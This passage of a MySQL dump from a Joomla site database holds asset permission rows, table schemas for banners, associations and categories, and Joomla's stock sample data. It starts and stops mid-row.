delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(77,62,60,61,5,'com_contact.category.52','O','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(78,62,62,63,5,'com_contact.category.53','P','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(79,62,64,65,5,'com_contact.category.54','Q','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(80,62,66,67,5,'com_contact.category.55','R','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(81,62,68,69,5,'com_contact.category.56','S','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(82,62,70,71,5,'com_contact.category.57','T','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(83,62,72,73,5,'com_contact.category.58','U','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(84,62,74,75,5,'com_contact.category.59','V','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(85,62,76,77,5,'com_contact.category.60','W','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(86,62,78,79,5,'com_contact.category.61','X','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(87,62,80,81,5,'com_contact.category.62','Y','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(88,62,82,83,5,'com_contact.category.63','Z','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(89,46,139,140,4,'com_content.article.1','Administrator Components','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(100,44,114,115,3,'com_content.category.71','Milky Way','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(104,44,116,117,3,'com_content.article.8','Beginners','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(105,46,141,142,4,'com_content.article.9','Contact','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(106,46,143,144,4,'com_content.article.10','Content','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(119,44,118,119,3,'com_content.article.21','Getting Help','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(120,44,120,121,3,'com_content.article.22','Getting Started','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(122,44,122,123,3,'com_content.article.24','Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(130,44,124,125,3,'com_content.article.32','Parameters','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(133,44,126,127,3,'com_content.article.35','Professionals','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(136,44,128,129,3,'com_content.article.38','Sample Sites','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(137,46,145,146,4,'com_content.article.39','Search','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(145,44,130,131,3,'com_content.article.47','The Joomla! Community','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(146,44,132,133,3,'com_content.article.48','The Joomla! Project','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(148,44,134,135,3,'com_content.article.50','Upgraders','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(150,46,147,148,4,'com_content.article.52','Users','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(151,44,136,137,3,'com_content.article.53','Using Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(158,46,149,150,4,'com_content.article.60','News Feeds','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(168,34,106,107,3,'com_content.article.67','What\'s New in 1.5?','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(169,24,279,280,2,'com_users.category.77','Uncategorised',''),(173,1,346,347,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(175,1,348,349,1,'com_tags','com_tags','{\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(176,1,350,351,1,'com_contenthistory','com_contenthistory','{}'),(177,1,352,353,1,'com_ajax','com_ajax','{}'),(178,1,354,355,1,'com_postinstall','com_postinstall','{}'),(179,8,153,178,2,'com_content.category.79','Blog','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(185,18,215,216,2,'com_modules.module.17','Breadcrumbs','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(186,18,217,218,2,'com_modules.module.35','Search','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(187,18,219,220,2,'com_modules.module.94','Contact Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),(188,18,221,222,2,'com_modules.module.95','Latest News','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),(189,18,223,224,2,'com_modules.module.96','Our Partners','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(190,18,225,226,2,'com_modules.module.97','Saleslogic Products','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),(191,179,154,155,3,'com_content.category.80','News','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(192,179,156,157,3,'com_content.category.81','Tutorial','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(193,179,158,159,3,'com_content.category.82','Review','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(194,179,160,161,3,'com_content.category.83','Updates','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(195,179,162,163,3,'com_content.article.71','Doner spare ribs pastrami shank','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(196,179,164,165,3,'com_content.article.72','Jerky shank chicken boudin','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(197,179,166,167,3,'com_content.article.73','Portable sales devices making a difference.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(198,179,168,169,3,'com_content.article.74','The salesman is dead. Long live the salesman.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(199,179,170,171,3,'com_content.article.75','5 Effective Email Unsubscribe Pages.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(200,179,172,173,3,'com_content.article.76','Who Actually Clicks on Banner Ads?','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(201,179,174,175,3,'com_content.article.77','Why we all need to be connected.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(203,18,227,228,2,'com_modules.module.99','Latest News','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(204,18,229,230,2,'com_modules.module.100','Search','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(205,18,231,232,2,'com_modules.module.101','Information','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(206,18,233,234,2,'com_modules.module.102','Search','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(207,18,235,236,2,'com_modules.module.103','Latest News','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(208,18,237,238,2,'com_modules.module.104','Information','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(209,18,239,240,2,'com_modules.module.105','Off Canvas Menu','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(212,18,241,242,2,'com_modules.module.108','Helix 3 Preset','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(214,1,356,357,1,'com_admintools','Admintools','{\"core.admin\":[],\"core.manage\":[],\"admintools.utils\":[],\"admintools.security\":[],\"admintools.maintenance\":[]}'),(215,1,358,359,1,'com_akeeba','Akeeba','{\"core.admin\":[],\"core.manage\":[],\"akeeba.backup\":[],\"akeeba.configure\":[],\"akeeba.download\":[]}'),(216,1,360,361,1,'com_watchfulli','Watchfulli','{}'),(217,1,362,365,1,'com_imagerecycle','ImageRecycle','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.own\":[]}'),(218,217,363,364,2,'com_imagerecycle.category.84','COM_IMAGERECYCLE_INSTALLER_NEW_CATEGORY','{}'),(219,18,243,244,2,'com_modules.module.110','JSitemap module','{}'),(220,18,245,246,2,'com_modules.module.111','JSitemap Quickicons','{}'),(221,1,366,367,1,'com_jmap','JMap','{}'),(222,18,247,248,2,'com_modules.module.112','News Show Pro GK5','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(223,1,368,371,1,'com_djimageslider','com_djimageslider','{}'),(224,18,249,250,2,'com_modules.module.113','DJ-ImageSlider','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(225,223,369,370,2,'com_djimageslider.category.85','Header','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(229,1,372,373,1,'com_sppagebuilder','SP Page Builder','{}'),(230,18,251,252,2,'com_modules.module.116','SP Page Builder','{}'),(231,18,253,254,2,'com_modules.module.117','SP Page Builder Admin Menu','{}'),(232,18,255,256,2,'com_modules.module.118','Top Buttons','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),(233,179,176,177,3,'com_content.article.78','Welcome to the future.','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(234,8,179,194,2,'com_content.category.86','Products','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(235,234,180,181,3,'com_content.article.79','Baselogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(236,234,186,187,3,'com_content.article.80','Clientlogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(237,234,182,183,3,'com_content.article.81','Quotelogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(238,234,184,185,3,'com_content.article.82','Replogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(239,234,188,189,3,'com_content.article.83','Tradelogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(240,234,190,191,3,'com_content.article.84','Weblogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(241,234,192,193,3,'com_content.article.85','Saleslogic','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(242,18,257,258,2,'com_modules.module.119','Saleslogic Products','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(243,1,374,375,1,'com_breezingforms','BreezingForms','{}'),(244,18,259,260,2,'com_modules.module.120','Contact Form','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}');
/*!40000 ALTER TABLE `atlyh_assets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_associations`
--
DROP TABLE IF EXISTS `atlyh_associations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_associations` (
`id` int(11) NOT NULL COMMENT 'A reference to the associated item.',
`context` varchar(50) NOT NULL COMMENT 'The context of the associated item.',
`key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
PRIMARY KEY (`context`,`id`),
KEY `idx_key` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_associations`
--
LOCK TABLES `atlyh_associations` WRITE;
/*!40000 ALTER TABLE `atlyh_associations` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_associations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_banner_clients`
--
DROP TABLE IF EXISTS `atlyh_banner_clients`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_banner_clients` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL DEFAULT '',
`contact` varchar(255) NOT NULL DEFAULT '',
`email` varchar(255) NOT NULL DEFAULT '',
`extrainfo` text NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`metakey` text NOT NULL,
`own_prefix` tinyint(4) NOT NULL DEFAULT 0,
`metakey_prefix` varchar(255) NOT NULL DEFAULT '',
`purchase_type` tinyint(4) NOT NULL DEFAULT -1,
`track_clicks` tinyint(4) NOT NULL DEFAULT -1,
`track_impressions` tinyint(4) NOT NULL DEFAULT -1,
PRIMARY KEY (`id`),
KEY `idx_own_prefix` (`own_prefix`),
KEY `idx_metakey_prefix` (`metakey_prefix`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_banner_clients`
--
LOCK TABLES `atlyh_banner_clients` WRITE;
/*!40000 ALTER TABLE `atlyh_banner_clients` DISABLE KEYS */;
INSERT INTO `atlyh_banner_clients` VALUES (1,'Joomla!','Administrator','email@email.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,-1,-1),(2,'Shop','Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0),(3,'Bookstore','Bookstore Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0);
/*!40000 ALTER TABLE `atlyh_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_banner_tracks`
--
DROP TABLE IF EXISTS `atlyh_banner_tracks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_banner_tracks` (
`track_date` datetime NOT NULL,
`track_type` int(10) unsigned NOT NULL,
`banner_id` int(10) unsigned NOT NULL,
`count` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
KEY `idx_track_date` (`track_date`),
KEY `idx_track_type` (`track_type`),
KEY `idx_banner_id` (`banner_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_banner_tracks`
--
LOCK TABLES `atlyh_banner_tracks` WRITE;
/*!40000 ALTER TABLE `atlyh_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_banners`
--
DROP TABLE IF EXISTS `atlyh_banners`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_banners` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`cid` int(11) NOT NULL DEFAULT 0,
`type` int(11) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`imptotal` int(11) NOT NULL DEFAULT 0,
`impmade` int(11) NOT NULL DEFAULT 0,
`clicks` int(11) NOT NULL DEFAULT 0,
`clickurl` varchar(200) NOT NULL DEFAULT '',
`state` tinyint(3) NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`description` text NOT NULL,
`custombannercode` varchar(2048) NOT NULL,
`sticky` tinyint(1) unsigned NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`metakey` text NOT NULL,
`params` text NOT NULL,
`own_prefix` tinyint(1) NOT NULL DEFAULT 0,
`metakey_prefix` varchar(255) NOT NULL DEFAULT '',
`purchase_type` tinyint(4) NOT NULL DEFAULT -1,
`track_clicks` tinyint(4) NOT NULL DEFAULT -1,
`track_impressions` tinyint(4) NOT NULL DEFAULT -1,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`language` char(7) NOT NULL DEFAULT '',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`version` int(10) unsigned NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `idx_state` (`state`),
KEY `idx_own_prefix` (`own_prefix`),
KEY `idx_metakey_prefix` (`metakey_prefix`),
KEY `idx_banner_catid` (`catid`),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_banners`
--
LOCK TABLES `atlyh_banners` WRITE;
/*!40000 ALTER TABLE `atlyh_banners` DISABLE KEYS */;
INSERT INTO `atlyh_banners` VALUES (2,3,0,'Shop 1','shop-1',0,0,0,'http://shop.joomla.org/amazoncom-bookstores.html',1,15,'Get books about Joomla! at the Joomla! Book Shop.','',0,1,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Books\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1),(3,2,0,'Shop 2','shop-2',0,0,0,'http://shop.joomla.org',1,15,'T Shirts, caps and more from the Joomla! Shop.','',0,2,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Shop\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1),(4,1,0,'Support Joomla!','support-joomla',0,0,0,'http://contribute.joomla.org',1,15,'Your contributions of time, talent and money make Joomla possible.','',0,3,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1);
/*!40000 ALTER TABLE `atlyh_banners` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_breezingforms`
--
DROP TABLE IF EXISTS `atlyh_breezingforms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_breezingforms` (
`id` int(11) NOT NULL,
`language` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_breezingforms`
--
LOCK TABLES `atlyh_breezingforms` WRITE;
/*!40000 ALTER TABLE `atlyh_breezingforms` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_breezingforms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_categories`
--
DROP TABLE IF EXISTS `atlyh_categories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_categories` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`lft` int(11) NOT NULL DEFAULT 0,
`rgt` int(11) NOT NULL DEFAULT 0,
`level` int(10) unsigned NOT NULL DEFAULT 0,
`path` varchar(255) NOT NULL DEFAULT '',
`extension` varchar(50) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL,
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`description` mediumtext NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`access` int(10) unsigned NOT NULL DEFAULT 0,
`params` text NOT NULL,
`metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.',
`metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.',
`metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `cat_idx` (`extension`,`published`,`access`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_path` (`path`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_alias` (`alias`),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=87 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_categories`
--
LOCK TABLES `atlyh_categories` WRITE;
/*!40000 ALTER TABLE `atlyh_categories` DISABLE KEYS */;
INSERT INTO `atlyh_categories` VALUES (1,0,0,0,107,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(9,34,1,13,14,1,'uncategorised','com_content','Uncategorised','uncategorised','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(10,35,1,87,88,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(11,36,1,83,84,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(12,37,1,19,20,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(15,40,1,85,86,1,'sample-data-banners','com_banners','Sample Data-Banners','sample-data-banners','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(16,41,1,21,82,1,'sample-data-contact','com_contact','Sample Data-Contact','sample-data-contact','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(17,42,1,17,18,1,'sample-data-newsfeeds','com_newsfeeds','Sample Data-Newsfeeds','sample-data-newsfeeds','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(19,44,1,1,4,1,'joomla','com_content','Joomla!','joomla','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',864,'2015-02-02 06:05:15',0,'*',1),(21,46,19,2,3,2,'joomla/components','com_content','Components','components','','<p>Components are larger extensions that produce the major content for your site. Each component has one or more \"views\" that control how content is displayed. In the Joomla administrator there are additional extensions such as Menus, Redirection, and the extension managers.</p>',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',864,'2015-02-02 06:05:23',0,'*',1),(34,59,16,22,23,2,'sample-data-contact/park-site','com_contact','Park Site','park-site','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'en-GB',1),(35,60,16,24,81,2,'sample-data-contact/shop-site','com_contact','Shop Site','shop-site','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(36,61,35,25,26,3,'sample-data-contact/shop-site/staff','com_contact','Staff','staff','','<p>Please feel free to contact our staff at any time should you need assistance.</p>',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 